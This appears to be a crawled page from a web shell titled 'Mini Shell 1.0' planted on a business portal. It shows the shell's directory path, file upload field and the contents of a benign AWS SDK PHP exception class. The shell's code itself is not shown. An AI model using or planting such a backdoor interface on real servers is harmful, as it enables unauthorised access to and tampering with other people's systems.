HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/devs.lapieza.net/vendor/aws/aws-sdk-php/src/Scheduler/Exception/
Upload File :
Current File : //var/www/devs.lapieza.net/vendor/aws/aws-sdk-php/src/Scheduler/Exception/SchedulerException.php
<?php
namespace Aws\Scheduler\Exception;

use Aws\Exception\AwsException;

/**
 * Represents an error interacting with the **Amazon EventBridge Scheduler** service.
 */
class SchedulerException extends AwsException {}